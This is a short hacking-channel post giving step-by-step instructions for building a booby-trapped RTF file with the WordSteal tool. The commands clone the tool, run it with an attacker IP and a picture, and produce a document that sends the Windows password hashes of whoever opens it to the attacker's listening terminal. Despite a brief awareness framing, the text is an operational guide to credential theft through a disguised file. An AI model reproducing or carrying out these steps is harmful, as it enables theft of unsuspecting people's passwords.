Hiding the password stealer in the document!

Hey Freaks ! The DeepNet here . So, Have you ever thought that when downloading and opening a document, an unpleasant situation, or rather a virus, may await you there? If not, then it's time to start checking even documents, otherwise the 21st century is in the yard.

 And today I will clearly show how scammers can embed a stealer into an RTF file using the WordSteal utility.

 When a user opens such a file, the "hacker" automatically receives hashes of Windows passwords.

🔸 Instructions

 

◾1. First you need

 Metasploit, Linux, Termux

 ◾2. After we run our utility:

 • apt install python git

 • git clone https://github.com/0x09AL/WordSteal.git

 • cd

 • chmod + x main.py

 ◾3. After launching you need a picture.  You must write an absolute path to it, or put it in a folder with a script and write only its name:

 • python main.py your_IP picture_name 1

 Example:

 • python main.py 128.0.0.1 kredo.jpg 1

 If everything went well, then the RTF with the embedded payload should appear in the folder.  The terminal does not need to be closed!

 Next, someone should open this file and all the password hashes will come to our terminal!